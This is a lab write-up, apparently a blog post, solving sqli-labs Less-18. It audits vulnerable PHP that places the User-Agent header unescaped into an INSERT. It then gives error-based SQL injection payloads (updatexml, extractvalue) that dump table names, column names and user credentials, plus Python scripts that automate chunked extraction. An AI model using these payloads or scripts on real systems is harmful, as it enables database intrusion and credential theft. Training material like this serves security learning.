SQL injection LESS18 (header injection + error injection)
2022-07-28 12:15:00 【Hua Weiyun】

Log in with Dumb:Dumb
Source audit
```php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Agent:'.$uname."\n");
    fclose($fp);

    $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);

    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
```

The check_input function is the same one used in SQL injection Less-17 (error injection + subquery); see the previous write-up for the details.
`$value = substr($value,0,20);` This time the truncation keeps the first twenty characters of the input.
`$uagent = $_SERVER['HTTP_USER_AGENT']; $IP = $_SERVER['REMOTE_ADDR'];` The entries of the `$_SERVER` array are populated by the web server. There is no guarantee that every server provides all of them: some may omit entries, or provide entries that are not documented. What matters here is that neither value passes through check_input: `HTTP_USER_AGENT` is copied verbatim from the request's User-Agent header.
`$uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']);` This time `$passwd` also goes through check_input, so both login fields are quoted and escaped with mysql_real_escape_string and we can no longer inject through passwd (or uname).
`$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1);` A single SELECT. `$row1` must be non-empty to enter the following `if`, so the uname and passwd we send must be the valid credentials of an existing user (Dumb:Dumb works).
== Core code ==
`$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert);` `$uagent` is concatenated into the INSERT and written to the database without any escaping.
We control `$uagent`, so that is where the payload goes.
The statement we want the server to execute is

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #

so set `$uagent` (the User-Agent header) to

' or updatexml(1, concat('#', database()), 0), 1, 1) #

The `1, 1)` hard-codes the remaining two columns in place of `$IP` and `$uname`, and the trailing `#` comments out the original `'$IP', $uname)`.

The payload can also keep the original shape of the statement:

' and updatexml(1, concat('#', database()), 0) and '1'='1

which gives `VALUES ('' and updatexml(...) and '1'='1', '$IP', $uname)`. Either way updatexml() raises an XPATH syntax error that carries the result of database(), and the page prints it through print_r(mysql_error()). Because the whole INSERT fails, no row is actually written to uagents.
The same template enumerates the tables, the columns of users, and finally the credentials:

' or updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0),1,1)#

' or updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0),1,1) #

' or updatexml(1, concat("#", (select group_concat(username,password) from users)), 0),1,1) #

One caveat: updatexml() (and extractvalue()) only includes the first 32 characters of the bad XPath string in the error message, so after the leading `#` at most 31 characters of data come back per request. Anything longer, such as the full group_concat of the users table, has to be read out in pieces with substring() or with limit.
A small script to send the payload in the User-Agent header with a valid login. The original hard-coded a wrong Content-Length (requests computes it), carried an IDE session cookie and shadowed the built-in `str`; those are cleaned up here.

```python
#coding:utf-8
import requests

url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"
marker = "flag"  # flag.jpg is only rendered after a successful login
print("start!")
key = {'uname': "admin", 'passwd': "admin"}
headers = {
    "Host": "localhost",
    # error-based payload in the User-Agent; the '~' delimiters make the leaked value easy to spot
    "User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}
res = requests.post(url, headers=headers, data=key).text
if marker in res:
    print("fish!")
    print(res)
print("end!")
```
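The script above pulls one value per request and cannot see anything past the 32-character limit of the updatexml()/extractvalue() error text. The following is an added example, not code from the original post: it slices the subquery result with substring() so each request leaks at most 30 characters between the `~` delimiters, then reassembles the pieces. The URL and the Dumb:Dumb login are taken from the page; `fake_server` is a constructed offline stand-in for the Less-18 response so the loop can be exercised without a lab instance.

```python
#!/usr/bin/env python3
"""Chunked error-based extraction through the User-Agent header.

Added example: updatexml()/extractvalue() only echo the first 32 characters
of the offending XPath string, so a long result (group_concat of users) must
be read out in slices with substring(). `requests` is only needed for the
live loop in main(); everything else runs offline.
"""
import re

try:
    import requests
except ImportError:  # the offline simulation below does not need it
    requests = None

URL = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"  # from the page
CREDS = {"uname": "Dumb", "passwd": "Dumb"}  # login must succeed or the INSERT never runs

CHUNK = 30  # 32-char error window minus the two '~' delimiters
LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")


def build_user_agent(subquery, offset):
    """User-Agent value for one slice. Uses the page's second payload shape
    (... and '1'='1) so the INSERT keeps its three values; `offset` is
    1-based like MySQL's substring()."""
    sliced = "substring((%s),%d,%d)" % (subquery, offset, CHUNK)
    return "' and updatexml(1,concat('~',%s,'~'),0) and '1'='1" % sliced


def parse_leak(body):
    """Text between the '~' delimiters of the MySQL error that the page prints
    via print_r(mysql_error()), or None when no error-based leak is present."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def extract(subquery, fetch):
    """Reassemble the full result of `subquery`, CHUNK characters per request.
    `fetch(user_agent) -> html` is passed in so the loop is testable offline."""
    out = []
    offset = 1
    while True:
        leak = parse_leak(fetch(build_user_agent(subquery, offset)))
        if not leak:           # None (no error) or '' (past the end of the data)
            break
        out.append(leak)
        if len(leak) < CHUNK:  # short slice: nothing more to read
            break
        offset += CHUNK
    return "".join(out)


def http_fetch(user_agent):
    """Live request against the lab (needs `requests` and a running Less-18)."""
    r = requests.post(URL, headers={"User-Agent": user_agent}, data=CREDS, timeout=10)
    return r.text


def fake_server(secret):
    """Constructed stand-in for the Less-18 page: answers each probe with the
    same 'XPATH syntax error' line that mysql_error() would produce."""
    def fetch(user_agent):
        m = re.search(r"substring\(\(.*?\),(\d+),(\d+)\)", user_agent)
        start, length = int(m.group(1)), int(m.group(2))
        piece = secret[start - 1:start - 1 + length]
        return "<br>XPATH syntax error: '~%s~'<br><br>" % piece
    return fetch


SAMPLE = "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword"  # constructed sample, 44 chars


if __name__ == "__main__":
    q = "select group_concat(username,':',password) from users"
    print("offline:", extract(q, fake_server(SAMPLE)))
    if requests is not None:
        print("live:", extract(q, http_fetch))
```

The loop stops on the first slice shorter than 30 characters, or on an empty `~~` leak when the data length is an exact multiple of the chunk size, so it needs no prior knowledge of the result length.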